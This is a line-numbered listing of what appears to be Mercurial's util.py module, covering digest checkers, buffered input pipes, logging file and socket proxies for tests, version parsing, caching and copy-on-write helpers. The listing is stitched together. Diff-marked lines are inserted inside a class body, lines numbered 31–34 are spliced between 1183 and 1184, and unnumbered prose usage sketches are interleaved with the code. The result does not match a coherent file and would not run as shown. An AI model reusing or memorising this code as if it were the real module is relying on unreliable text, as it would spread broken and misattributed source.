202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 >>> digester.preferred([b'md5', b'sha1'])
204 'sha1'
205 """
206
207 def __init__(self, digests, s=''):
208 self._hashes = {}
209 for k in digests:
210 if k not in DIGESTS:
211 raise error.Abort(_('unknown digest type: %s') % k)
212 self._hashes[k] = DIGESTS[k]()
213 if s:
214 self.update(s)
215
216 def update(self, data):
217 for h in self._hashes.values():
218 h.update(data)
219
220 def __getitem__(self, key):
221 if key not in DIGESTS:
222 raise error.Abort(_('unknown digest type: %s') % key)
223 return nodemod.hex(self._hashes[key].digest())
224
225 def __iter__(self):
226 return iter(self._hashes)
227
228 @staticmethod
229 def preferred(supported):
230 """returns the strongest digest type in both supported and DIGESTS."""
231
232 for k in DIGESTS_BY_STRENGTH:
233 if k in supported:
234 return k
235 return None
236
237 class digestchecker(object):
238 """file handle wrapper that additionally checks content against a given
239 size and digests.
240
241 d = digestchecker(fh, size, {'md5': '...'})
242
243 When multiple digests are given, all of them are validated.
244 """
245
246 def __init__(self, fh, size, digests):
247 self._fh = fh
248 self._size = size
249 self._got = 0
250 self._digests = dict(digests)
251 self._digester = digester(self._digests.keys())
252
253 def read(self, length=-1):
254 content = self._fh.read(length)
255 self._digester.update(content)
256 self._got += len(content)
257 return content
258
259 def validate(self):
260 if self._size != self._got:
261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 (self._size, self._got))
263 for k, v in self._digests.items():
264 if v != self._digester[k]:
265 # i18n: first parameter is a digest name
266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 (k, v, self._digester[k]))
268
269 try:
270 buffer = buffer
271 except NameError:
272 def buffer(sliceable, offset=0, length=None):
273 if length is not None:
274 return memoryview(sliceable)[offset:offset + length]
275 return memoryview(sliceable)[offset:]
276
277 _chunksize = 4096
278
279 class bufferedinputpipe(object):
280 """a manually buffered input pipe
281
282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 the same time. We cannot probe the buffer state and select will not detect
284 that data are ready to read if they are already buffered.
285
286 This class let us work around that by implementing its own buffering
287 (allowing efficient readline) while offering a way to know if the buffer is
288 empty from the output (allowing collaboration of the buffer with polling).
289
290 This class lives in the 'util' module because it makes use of the 'os'
291 module from the python stdlib.
292 """
293 def __new__(cls, fh):
294 # If we receive a fileobjectproxy, we need to use a variation of this
295 # class that notifies observers about activity.
296 if isinstance(fh, fileobjectproxy):
297 cls = observedbufferedinputpipe
298
299 return super(bufferedinputpipe, cls).__new__(cls)
300
301 def __init__(self, input):
302 self._input = input
303 self._buffer = []
304 self._eof = False
305 self._lenbuf = 0
306
307 @property
308 def hasbuffer(self):
309 """True is any data is currently buffered
310
311 This will be used externally as a pre-step for polling IO. If there is
312 already data then no polling should be set in place."""
313 return bool(self._buffer)
314
315 @property
316 def closed(self):
317 return self._input.closed
318
319 def fileno(self):
320 return self._input.fileno()
321
322 def close(self):
323 return self._input.close()
324
325 def read(self, size):
326 while (not self._eof) and (self._lenbuf < size):
327 self._fillbuffer()
328 return self._frombuffer(size)
329
330 def unbufferedread(self, size):
331 if not self._eof and self._lenbuf == 0:
332 self._fillbuffer(max(size, _chunksize))
333 return self._frombuffer(min(self._lenbuf, size))
334
335 def readline(self, *args, **kwargs):
336 if len(self._buffer) > 1:
337 # this should not happen because both read and readline end with a
338 # _frombuffer call that collapses it.
339 self._buffer = [''.join(self._buffer)]
340 self._lenbuf = len(self._buffer[0])
341 lfi = -1
342 if self._buffer:
343 lfi = self._buffer[-1].find('\n')
344 while (not self._eof) and lfi < 0:
345 self._fillbuffer()
346 if self._buffer:
347 lfi = self._buffer[-1].find('\n')
348 size = lfi + 1
349 if lfi < 0: # end of file
350 size = self._lenbuf
351 elif len(self._buffer) > 1:
352 # we need to take previous chunks into account
353 size += self._lenbuf - len(self._buffer[-1])
354 return self._frombuffer(size)
355
356 def _frombuffer(self, size):
357 """return at most 'size' data from the buffer
358
359 The data are removed from the buffer."""
360 if size == 0 or not self._buffer:
361 return ''
362 buf = self._buffer[0]
363 if len(self._buffer) > 1:
364 buf = ''.join(self._buffer)
365
366 data = buf[:size]
367 buf = buf[len(data):]
368 if buf:
369 self._buffer = [buf]
370 self._lenbuf = len(buf)
371 else:
372 self._buffer = []
373 self._lenbuf = 0
374 return data
375
376 def _fillbuffer(self, size=_chunksize):
377 """read data to the buffer"""
378 data = os.read(self._input.fileno(), size)
379 if not data:
380 self._eof = True
381 else:
382 self._lenbuf += len(data)
383 self._buffer.append(data)
384
385 return data
386
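A usage sketch for the pipe wrapper (Python 2 era string semantics; `hasbuffer` is the piece a polling loop consults before blocking):

    import os
    from mercurial import util

    rfd, wfd = os.pipe()
    os.write(wfd, b'first line\nrest')
    os.close(wfd)

    pipe = util.bufferedinputpipe(os.fdopen(rfd, 'rb'))
    line = pipe.readline()     # 'first line\n'
    print(pipe.hasbuffer)      # True: 'rest' is buffered, so skip polling
    rest = pipe.read(4)        # 'rest'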
387 def mmapread(fp):
388 try:
389 fd = getattr(fp, 'fileno', lambda: fp)()
390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 except ValueError:
392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 # if the file is empty, and if so, return an empty buffer.
394 if os.fstat(fd).st_size == 0:
395 return ''
396 raise
397
398 class fileobjectproxy(object):
399 """A proxy around file objects that tells a watcher when events occur.
400
401 This type is intended to only be used for testing purposes. Think hard
402 before using it in important code.
403 """
404 __slots__ = (
405 r'_orig',
406 r'_observer',
407 )
408
409 def __init__(self, fh, observer):
410 object.__setattr__(self, r'_orig', fh)
411 object.__setattr__(self, r'_observer', observer)
412
413 def __getattribute__(self, name):
414 ours = {
415 r'_observer',
416
417 # IOBase
418 r'close',
419 # closed if a property
420 r'fileno',
421 r'flush',
422 r'isatty',
423 r'readable',
424 r'readline',
425 r'readlines',
426 r'seek',
427 r'seekable',
428 r'tell',
429 r'truncate',
430 r'writable',
431 r'writelines',
432 # RawIOBase
433 r'read',
434 r'readall',
435 r'readinto',
436 r'write',
437 # BufferedIOBase
438 # raw is a property
439 r'detach',
440 # read defined above
441 r'read1',
442 # readinto defined above
443 # write defined above
444 }
445
446 # We only observe some methods.
447 if name in ours:
448 return object.__getattribute__(self, name)
449
450 return getattr(object.__getattribute__(self, r'_orig'), name)
451
452 def __nonzero__(self):
453 return bool(object.__getattribute__(self, r'_orig'))
454
455 __bool__ = __nonzero__
456
457 def __delattr__(self, name):
458 return delattr(object.__getattribute__(self, r'_orig'), name)
459
460 def __setattr__(self, name, value):
461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462
463 def __iter__(self):
464 return object.__getattribute__(self, r'_orig').__iter__()
465
466 def _observedcall(self, name, *args, **kwargs):
467 # Call the original object.
468 orig = object.__getattribute__(self, r'_orig')
469 res = getattr(orig, name)(*args, **kwargs)
470
471 # Call a method on the observer of the same name with arguments
472 # so it can react, log, etc.
473 observer = object.__getattribute__(self, r'_observer')
474 fn = getattr(observer, name, None)
475 if fn:
476 fn(res, *args, **kwargs)
477
478 return res
479
480 def close(self, *args, **kwargs):
481 return object.__getattribute__(self, r'_observedcall')(
482 r'close', *args, **kwargs)
483
484 def fileno(self, *args, **kwargs):
485 return object.__getattribute__(self, r'_observedcall')(
486 r'fileno', *args, **kwargs)
487
488 def flush(self, *args, **kwargs):
489 return object.__getattribute__(self, r'_observedcall')(
490 r'flush', *args, **kwargs)
491
492 def isatty(self, *args, **kwargs):
493 return object.__getattribute__(self, r'_observedcall')(
494 r'isatty', *args, **kwargs)
495
496 def readable(self, *args, **kwargs):
497 return object.__getattribute__(self, r'_observedcall')(
498 r'readable', *args, **kwargs)
499
500 def readline(self, *args, **kwargs):
501 return object.__getattribute__(self, r'_observedcall')(
502 r'readline', *args, **kwargs)
503
504 def readlines(self, *args, **kwargs):
505 return object.__getattribute__(self, r'_observedcall')(
506 r'readlines', *args, **kwargs)
507
508 def seek(self, *args, **kwargs):
509 return object.__getattribute__(self, r'_observedcall')(
510 r'seek', *args, **kwargs)
511
512 def seekable(self, *args, **kwargs):
513 return object.__getattribute__(self, r'_observedcall')(
514 r'seekable', *args, **kwargs)
515
516 def tell(self, *args, **kwargs):
517 return object.__getattribute__(self, r'_observedcall')(
518 r'tell', *args, **kwargs)
519
520 def truncate(self, *args, **kwargs):
521 return object.__getattribute__(self, r'_observedcall')(
522 r'truncate', *args, **kwargs)
523
524 def writable(self, *args, **kwargs):
525 return object.__getattribute__(self, r'_observedcall')(
526 r'writable', *args, **kwargs)
527
528 def writelines(self, *args, **kwargs):
529 return object.__getattribute__(self, r'_observedcall')(
530 r'writelines', *args, **kwargs)
531
532 def read(self, *args, **kwargs):
533 return object.__getattribute__(self, r'_observedcall')(
534 r'read', *args, **kwargs)
535
536 def readall(self, *args, **kwargs):
537 return object.__getattribute__(self, r'_observedcall')(
538 r'readall', *args, **kwargs)
539
540 def readinto(self, *args, **kwargs):
541 return object.__getattribute__(self, r'_observedcall')(
542 r'readinto', *args, **kwargs)
543
544 def write(self, *args, **kwargs):
545 return object.__getattribute__(self, r'_observedcall')(
546 r'write', *args, **kwargs)
547
548 def detach(self, *args, **kwargs):
549 return object.__getattribute__(self, r'_observedcall')(
550 r'detach', *args, **kwargs)
551
552 def read1(self, *args, **kwargs):
553 return object.__getattribute__(self, r'_observedcall')(
554 r'read1', *args, **kwargs)
555
556 class observedbufferedinputpipe(bufferedinputpipe):
557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558
559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 bypass ``fileobjectproxy``. Because of this, we need to make
561 ``bufferedinputpipe`` aware of these operations.
562
563 This variation of ``bufferedinputpipe`` can notify observers about
564 ``os.read()`` events. It also re-publishes other events, such as
565 ``read()`` and ``readline()``.
566 """
567 def _fillbuffer(self):
568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569
570 fn = getattr(self._input._observer, r'osread', None)
571 if fn:
572 fn(res, _chunksize)
573
574 return res
575
576 # We use different observer methods because the operation isn't
577 # performed on the actual file object but on us.
578 def read(self, size):
579 res = super(observedbufferedinputpipe, self).read(size)
580
581 fn = getattr(self._input._observer, r'bufferedread', None)
582 if fn:
583 fn(res, size)
584
585 return res
586
587 def readline(self, *args, **kwargs):
588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589
590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 if fn:
592 fn(res)
593
594 return res
595
596 PROXIED_SOCKET_METHODS = {
597 r'makefile',
598 r'recv',
599 r'recvfrom',
600 r'recvfrom_into',
601 r'recv_into',
602 r'send',
603 r'sendall',
604 r'sendto',
605 r'setblocking',
606 r'settimeout',
607 r'gettimeout',
608 r'setsockopt',
609 }
610
611 class socketproxy(object):
612 """A proxy around a socket that tells a watcher when events occur.
613
614 This is like ``fileobjectproxy`` except for sockets.
615
616 This type is intended to only be used for testing purposes. Think hard
617 before using it in important code.
618 """
619 __slots__ = (
620 r'_orig',
621 r'_observer',
622 )
623
624 def __init__(self, sock, observer):
625 object.__setattr__(self, r'_orig', sock)
626 object.__setattr__(self, r'_observer', observer)
627
628 def __getattribute__(self, name):
629 if name in PROXIED_SOCKET_METHODS:
630 return object.__getattribute__(self, name)
631
632 return getattr(object.__getattribute__(self, r'_orig'), name)
633
634 def __delattr__(self, name):
635 return delattr(object.__getattribute__(self, r'_orig'), name)
636
637 def __setattr__(self, name, value):
638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639
640 def __nonzero__(self):
641 return bool(object.__getattribute__(self, r'_orig'))
642
643 __bool__ = __nonzero__
644
645 def _observedcall(self, name, *args, **kwargs):
646 # Call the original object.
647 orig = object.__getattribute__(self, r'_orig')
648 res = getattr(orig, name)(*args, **kwargs)
649
650 # Call a method on the observer of the same name with arguments
651 # so it can react, log, etc.
652 observer = object.__getattribute__(self, r'_observer')
653 fn = getattr(observer, name, None)
654 if fn:
655 fn(res, *args, **kwargs)
656
657 return res
658
659 def makefile(self, *args, **kwargs):
660 res = object.__getattribute__(self, r'_observedcall')(
661 r'makefile', *args, **kwargs)
662
663 # The file object may be used for I/O. So we turn it into a
664 # proxy using our observer.
665 observer = object.__getattribute__(self, r'_observer')
666 return makeloggingfileobject(observer.fh, res, observer.name,
667 reads=observer.reads,
668 writes=observer.writes,
669 logdata=observer.logdata,
670 logdataapis=observer.logdataapis)
671
672 def recv(self, *args, **kwargs):
673 return object.__getattribute__(self, r'_observedcall')(
674 r'recv', *args, **kwargs)
675
676 def recvfrom(self, *args, **kwargs):
677 return object.__getattribute__(self, r'_observedcall')(
678 r'recvfrom', *args, **kwargs)
679
680 def recvfrom_into(self, *args, **kwargs):
681 return object.__getattribute__(self, r'_observedcall')(
682 r'recvfrom_into', *args, **kwargs)
683
684 def recv_into(self, *args, **kwargs):
685 return object.__getattribute__(self, r'_observedcall')(
686 r'recv_into', *args, **kwargs)
687
688 def send(self, *args, **kwargs):
689 return object.__getattribute__(self, r'_observedcall')(
690 r'send', *args, **kwargs)
691
692 def sendall(self, *args, **kwargs):
693 return object.__getattribute__(self, r'_observedcall')(
694 r'sendall', *args, **kwargs)
695
696 def sendto(self, *args, **kwargs):
697 return object.__getattribute__(self, r'_observedcall')(
698 r'sendto', *args, **kwargs)
699
700 def setblocking(self, *args, **kwargs):
701 return object.__getattribute__(self, r'_observedcall')(
702 r'setblocking', *args, **kwargs)
703
704 def settimeout(self, *args, **kwargs):
705 return object.__getattribute__(self, r'_observedcall')(
706 r'settimeout', *args, **kwargs)
707
708 def gettimeout(self, *args, **kwargs):
709 return object.__getattribute__(self, r'_observedcall')(
710 r'gettimeout', *args, **kwargs)
711
712 def setsockopt(self, *args, **kwargs):
713 return object.__getattribute__(self, r'_observedcall')(
714 r'setsockopt', *args, **kwargs)
715
716 class baseproxyobserver(object):
717 def _writedata(self, data):
718 if not self.logdata:
719 if self.logdataapis:
720 self.fh.write('\n')
721 self.fh.flush()
722 return
723
724 # Simple case writes all data on a single line.
725 if b'\n' not in data:
726 if self.logdataapis:
727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 else:
729 self.fh.write('%s> %s\n'
730 % (self.name, stringutil.escapestr(data)))
731 self.fh.flush()
732 return
733
734 # Data with newlines is written to multiple lines.
735 if self.logdataapis:
736 self.fh.write(':\n')
737
738 lines = data.splitlines(True)
739 for line in lines:
740 self.fh.write('%s> %s\n'
741 % (self.name, stringutil.escapestr(line)))
742 self.fh.flush()
743
744 class fileobjectobserver(baseproxyobserver):
745 """Logs file object activity."""
746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 logdataapis=True):
748 self.fh = fh
749 self.name = name
750 self.logdata = logdata
751 self.logdataapis = logdataapis
752 self.reads = reads
753 self.writes = writes
754
755 def read(self, res, size=-1):
756 if not self.reads:
757 return
758 # Python 3 can return None from reads at EOF instead of empty strings.
759 if res is None:
760 res = ''
761
762 if size == -1 and res == '':
763 # Suppress pointless read(-1) calls that return
764 # nothing. These happen _a lot_ on Python 3, and there
765 # doesn't seem to be a better workaround to have matching
766 # Python 2 and 3 behavior. :(
767 return
768
769 if self.logdataapis:
770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771
772 self._writedata(res)
773
774 def readline(self, res, limit=-1):
775 if not self.reads:
776 return
777
778 if self.logdataapis:
779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780
781 self._writedata(res)
782
783 def readinto(self, res, dest):
784 if not self.reads:
785 return
786
787 if self.logdataapis:
788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 res))
790
791 data = dest[0:res] if res is not None else b''
792
793 # _writedata() uses "in" operator and is confused by memoryview because
794 # characters are ints on Python 3.
795 if isinstance(data, memoryview):
796 data = data.tobytes()
797
798 self._writedata(data)
799
800 def write(self, res, data):
801 if not self.writes:
802 return
803
804 # Python 2 returns None from some write() calls. Python 3 (reasonably)
805 # returns the integer bytes written.
806 if res is None and data:
807 res = len(data)
808
809 if self.logdataapis:
810 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
811
812 self._writedata(data)
813
814 def flush(self, res):
815 if not self.writes:
816 return
817
818 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
819
+
+SERVERROLE = 'server'
+CLIENTROLE = 'client'
820 # For observedbufferedinputpipe.
821 def bufferedread(self, res, size):
822 if not self.reads:
823 return
824
825 if self.logdataapis:
826 self.fh.write('%s> bufferedread(%d) -> %d' % (
827 self.name, size, len(res)))
828
829 self._writedata(res)
830
831 def bufferedreadline(self, res):
832 if not self.reads:
833 return
834
835 if self.logdataapis:
836 self.fh.write('%s> bufferedreadline() -> %d' % (
837 self.name, len(res)))
838
839 self._writedata(res)
840
841 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
842 logdata=False, logdataapis=True):
843 """Turn a file object into a logging file object."""
844
845 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
846 logdata=logdata, logdataapis=logdataapis)
847 return fileobjectproxy(fh, observer)
848
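A sketch of the test-suite usage this enables (observer output format as implemented above; Python 2 era byte strings):

    import io
    from mercurial import util

    logfh = io.BytesIO()
    proxied = util.makeloggingfileobject(logfh, io.BytesIO(b'payload'),
                                         b'example', logdata=True)

    proxied.read(3)            # performs the read, then logs it
    print(logfh.getvalue())    # example> read(3) -> 3: pay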
849 class socketobserver(baseproxyobserver):
850 """Logs socket activity."""
851 def __init__(self, fh, name, reads=True, writes=True, states=True,
852 logdata=False, logdataapis=True):
853 self.fh = fh
854 self.name = name
855 self.reads = reads
856 self.writes = writes
857 self.states = states
858 self.logdata = logdata
859 self.logdataapis = logdataapis
860
861 def makefile(self, res, mode=None, bufsize=None):
862 if not self.states:
863 return
864
865 self.fh.write('%s> makefile(%r, %r)\n' % (
866 self.name, mode, bufsize))
867
868 def recv(self, res, size, flags=0):
869 if not self.reads:
870 return
871
872 if self.logdataapis:
873 self.fh.write('%s> recv(%d, %d) -> %d' % (
874 self.name, size, flags, len(res)))
875 self._writedata(res)
876
877 def recvfrom(self, res, size, flags=0):
878 if not self.reads:
879 return
880
881 if self.logdataapis:
882 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
883 self.name, size, flags, len(res[0])))
884
885 self._writedata(res[0])
886
887 def recvfrom_into(self, res, buf, size, flags=0):
888 if not self.reads:
889 return
890
891 if self.logdataapis:
892 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
893 self.name, size, flags, res[0]))
894
895 self._writedata(buf[0:res[0]])
896
897 def recv_into(self, res, buf, size=0, flags=0):
898 if not self.reads:
899 return
900
901 if self.logdataapis:
902 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
903 self.name, size, flags, res))
904
905 self._writedata(buf[0:res])
906
907 def send(self, res, data, flags=0):
908 if not self.writes:
909 return
910
911 self.fh.write('%s> send(%d, %d) -> %d' % (
912 self.name, len(data), flags, len(res)))
913 self._writedata(data)
914
915 def sendall(self, res, data, flags=0):
916 if not self.writes:
917 return
918
919 if self.logdataapis:
920 # Returns None on success. So don't bother reporting return value.
921 self.fh.write('%s> sendall(%d, %d)' % (
922 self.name, len(data), flags))
923
924 self._writedata(data)
925
926 def sendto(self, res, data, flagsoraddress, address=None):
927 if not self.writes:
928 return
929
930 if address:
931 flags = flagsoraddress
932 else:
933 flags = 0
934
935 if self.logdataapis:
936 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
937 self.name, len(data), flags, address, res))
938
939 self._writedata(data)
940
941 def setblocking(self, res, flag):
942 if not self.states:
943 return
944
945 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
946
947 def settimeout(self, res, value):
948 if not self.states:
949 return
950
951 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
952
953 def gettimeout(self, res):
954 if not self.states:
955 return
956
957 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
958
959 def setsockopt(self, res, level, optname, value):
960 if not self.states:
961 return
962
963 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
964 self.name, level, optname, value, res))
965
966 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
967 logdata=False, logdataapis=True):
968 """Turn a socket into a logging socket."""
969
970 observer = socketobserver(logh, name, reads=reads, writes=writes,
971 states=states, logdata=logdata,
972 logdataapis=logdataapis)
973 return socketproxy(fh, observer)
974
975 def version():
976 """Return version information if available."""
977 try:
978 from . import __version__
979 return __version__.version
980 except ImportError:
981 return 'unknown'
982
983 def versiontuple(v=None, n=4):
984 """Parses a Mercurial version string into an N-tuple.
985
986 The version string to be parsed is specified with the ``v`` argument.
987 If it isn't defined, the current Mercurial version string will be parsed.
988
989 ``n`` can be 2, 3, or 4. Here is how some version strings map to
990 returned values:
991
992 >>> v = b'3.6.1+190-df9b73d2d444'
993 >>> versiontuple(v, 2)
994 (3, 6)
995 >>> versiontuple(v, 3)
996 (3, 6, 1)
997 >>> versiontuple(v, 4)
998 (3, 6, 1, '190-df9b73d2d444')
999
1000 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1001 (3, 6, 1, '190-df9b73d2d444+20151118')
1002
1003 >>> v = b'3.6'
1004 >>> versiontuple(v, 2)
1005 (3, 6)
1006 >>> versiontuple(v, 3)
1007 (3, 6, None)
1008 >>> versiontuple(v, 4)
1009 (3, 6, None, None)
1010
1011 >>> v = b'3.9-rc'
1012 >>> versiontuple(v, 2)
1013 (3, 9)
1014 >>> versiontuple(v, 3)
1015 (3, 9, None)
1016 >>> versiontuple(v, 4)
1017 (3, 9, None, 'rc')
1018
1019 >>> v = b'3.9-rc+2-02a8fea4289b'
1020 >>> versiontuple(v, 2)
1021 (3, 9)
1022 >>> versiontuple(v, 3)
1023 (3, 9, None)
1024 >>> versiontuple(v, 4)
1025 (3, 9, None, 'rc+2-02a8fea4289b')
1026
1027 >>> versiontuple(b'4.6rc0')
1028 (4, 6, None, 'rc0')
1029 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1030 (4, 6, None, 'rc0+12-425d55e54f98')
1031 >>> versiontuple(b'.1.2.3')
1032 (None, None, None, '.1.2.3')
1033 >>> versiontuple(b'12.34..5')
1034 (12, 34, None, '..5')
1035 >>> versiontuple(b'1.2.3.4.5.6')
1036 (1, 2, 3, '.4.5.6')
1037 """
1038 if not v:
1039 v = version()
1040 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1041 if not m:
1042 vparts, extra = '', v
1043 elif m.group(2):
1044 vparts, extra = m.groups()
1045 else:
1046 vparts, extra = m.group(1), None
1047
1048 vints = []
1049 for i in vparts.split('.'):
1050 try:
1051 vints.append(int(i))
1052 except ValueError:
1053 break
1054 # (3, 6) -> (3, 6, None)
1055 while len(vints) < 3:
1056 vints.append(None)
1057
1058 if n == 2:
1059 return (vints[0], vints[1])
1060 if n == 3:
1061 return (vints[0], vints[1], vints[2])
1062 if n == 4:
1063 return (vints[0], vints[1], vints[2], extra)
1064
1065 def cachefunc(func):
1066 '''cache the result of function calls'''
1067 # XXX doesn't handle keywords args
1068 if func.__code__.co_argcount == 0:
1069 cache = []
1070 def f():
1071 if len(cache) == 0:
1072 cache.append(func())
1073 return cache[0]
1074 return f
1075 cache = {}
1076 if func.__code__.co_argcount == 1:
1077 # we gain a small amount of time because
1078 # we don't need to pack/unpack the list
1079 def f(arg):
1080 if arg not in cache:
1081 cache[arg] = func(arg)
1082 return cache[arg]
1083 else:
1084 def f(*args):
1085 if args not in cache:
1086 cache[args] = func(*args)
1087 return cache[args]
1088
1089 return f
1090
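A sketch of what the memoization buys (the `slowsquare` function is invented for illustration): the wrapped function runs once per distinct argument, and later calls are served from the cache.

calls = []
def slowsquare(x):
    calls.append(x)            # record real invocations
    return x * x

fastsquare = cachefunc(slowsquare)
assert fastsquare(3) == 9
assert fastsquare(3) == 9      # second call is a cache hit
assert calls == [3]            # slowsquare only ran once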
1091 class cow(object):
1092 """helper class to make copy-on-write easier
1093
1094 Call preparewrite before doing any writes.
1095 """
1096
1097 def preparewrite(self):
1098 """call this before writes, return self or a copied new object"""
1099 if getattr(self, '_copied', 0):
1100 self._copied -= 1
1101 return self.__class__(self)
1102 return self
1103
1104 def copy(self):
1105 """always do a cheap copy"""
1106 self._copied = getattr(self, '_copied', 0) + 1
1107 return self
1108
1109 class sortdict(collections.OrderedDict):
1110 '''a simple sorted dictionary
1111
1112 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1113 >>> d2 = d1.copy()
1114 >>> d2
1115 sortdict([('a', 0), ('b', 1)])
1116 >>> d2.update([(b'a', 2)])
1117 >>> list(d2.keys()) # should still be in last-set order
1118 ['b', 'a']
1119 '''
1120
1121 def __setitem__(self, key, value):
1122 if key in self:
1123 del self[key]
1124 super(sortdict, self).__setitem__(key, value)
1125
1126 if pycompat.ispypy:
1127 # __setitem__() isn't called as of PyPy 5.8.0
1128 def update(self, src):
1129 if isinstance(src, dict):
1130 src = src.iteritems()
1131 for k, v in src:
1132 self[k] = v
1133
1134 class cowdict(cow, dict):
1135 """copy-on-write dict
1136
1137 Be sure to call d = d.preparewrite() before writing to d.
1138
1139 >>> a = cowdict()
1140 >>> a is a.preparewrite()
1141 True
1142 >>> b = a.copy()
1143 >>> b is a
1144 True
1145 >>> c = b.copy()
1146 >>> c is a
1147 True
1148 >>> a = a.preparewrite()
1149 >>> b is a
1150 False
1151 >>> a is a.preparewrite()
1152 True
1153 >>> c = c.preparewrite()
1154 >>> b is c
1155 False
1156 >>> b is b.preparewrite()
1157 True
1158 """
1159
1160 class cowsortdict(cow, sortdict):
1161 """copy-on-write sortdict
1162
1163 Be sure to call d = d.preparewrite() before writing to d.
1164 """
1165
1166 class transactional(object):
1167 """Base class for making a transactional type into a context manager."""
1168 __metaclass__ = abc.ABCMeta
1169
1170 @abc.abstractmethod
1171 def close(self):
1172 """Successfully closes the transaction."""
1173
1174 @abc.abstractmethod
1175 def release(self):
1176 """Marks the end of the transaction.
1177
1178 If the transaction has not been closed, it will be aborted.
1179 """
1180
1181 def __enter__(self):
1182 return self
1183
31
32 compewireprotosupport = collections.namedtuple(r'compenginewireprotosupport',
33 (r'name', r'serverpriority',
34 r'clientpriority'))
1184 def __exit__(self, exc_type, exc_val, exc_tb):
1185 try:
1186 if exc_type is None:
1187 self.close()
1188 finally:
1189 self.release()
1190
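For illustration (the `dummytx` class is invented here), the contract this base class encodes: a clean exit of the with block calls close() and then release(), while an exception skips close() so release() aborts the transaction.

class dummytx(transactional):
    def close(self):
        print('committed')
    def release(self):
        print('released')

with dummytx():
    pass    # prints 'committed' then 'released'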
1191 @contextlib.contextmanager
1192 def acceptintervention(tr=None):
1193 """A context manager that closes the transaction on InterventionRequired
1194
1195 If no transaction was provided, this simply runs the body and returns.
1196 """
1197 if not tr:
1198 yield
1199 return
1200 try:
1201 yield
1202 tr.close()
1203 except error.InterventionRequired:
1204 tr.close()
1205 raise
1206 finally:
1207 tr.release()
1208
1209 @contextlib.contextmanager
1210 def nullcontextmanager():
1211 yield
1212
1213 class _lrucachenode(object):
1214 """A node in a doubly linked list.
1215
1216 Holds a reference to nodes on either side as well as a key-value
1217 pair for the dictionary entry.
1218 """
1219 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1220
1221 def __init__(self):
1222 self.next = None
1223 self.prev = None
1224
1225 self.key = _notset
1226 self.value = None
1227 self.cost = 0
1228
1229 def markempty(self):
1230 """Mark the node as emptied."""
1231 self.key = _notset
1232 self.value = None
1233 self.cost = 0
1234
1235 class lrucachedict(object):
1236 """Dict that caches most recent accesses and sets.
1237
1238 The dict consists of an actual backing dict - indexed by original
1239 key - and a doubly linked circular list defining the order of entries in
1240 the cache.
1241
1242 The head node is the newest entry in the cache. If the cache is full,
1243 we recycle head.prev and make it the new head. Cache accesses result in
1244 the node being moved to before the existing head and being marked as the
1245 new head node.
1246
1247 Items in the cache can be inserted with an optional "cost" value. This is
1248 simply an integer that is specified by the caller. The cache can be queried
1249 for the total cost of all items presently in the cache.
1250
1251 The cache can also define a maximum cost. If a cache insertion would
1252 cause the total cost of the cache to go beyond the maximum cost limit,
1253 nodes will be evicted to make room for the new node. This can be used
1254 to e.g. set a max memory limit and associate an estimated bytes size
1255 cost to each item in the cache. By default, no maximum cost is enforced.
1256 """
1257 def __init__(self, max, maxcost=0):
1258 self._cache = {}
1259
1260 self._head = head = _lrucachenode()
1261 head.prev = head
1262 head.next = head
1263 self._size = 1
1264 self.capacity = max
1265 self.totalcost = 0
1266 self.maxcost = maxcost
1267
1268 def __len__(self):
1269 return len(self._cache)
1270
1271 def __contains__(self, k):
1272 return k in self._cache
1273
1274 def __iter__(self):
1275 # We don't have to iterate in cache order, but why not.
1276 n = self._head
1277 for i in range(len(self._cache)):
1278 yield n.key
1279 n = n.next
1280
1281 def __getitem__(self, k):
1282 node = self._cache[k]
1283 self._movetohead(node)
1284 return node.value
1285
1286 def insert(self, k, v, cost=0):
1287 """Insert a new item in the cache with optional cost value."""
1288 node = self._cache.get(k)
1289 # Replace existing value and mark as newest.
1290 if node is not None:
1291 self.totalcost -= node.cost
1292 node.value = v
1293 node.cost = cost
1294 self.totalcost += cost
1295 self._movetohead(node)
1296
1297 if self.maxcost:
1298 self._enforcecostlimit()
1299
1300 return
1301
1302 if self._size < self.capacity:
1303 node = self._addcapacity()
1304 else:
1305 # Grab the last/oldest item.
1306 node = self._head.prev
1307
1308 # At capacity. Kill the old entry.
1309 if node.key is not _notset:
1310 self.totalcost -= node.cost
1311 del self._cache[node.key]
1312
1313 node.key = k
1314 node.value = v
1315 node.cost = cost
1316 self.totalcost += cost
1317 self._cache[k] = node
1318 # And mark it as newest entry. No need to adjust order since it
1319 # is already self._head.prev.
1320 self._head = node
1321
1322 if self.maxcost:
1323 self._enforcecostlimit()
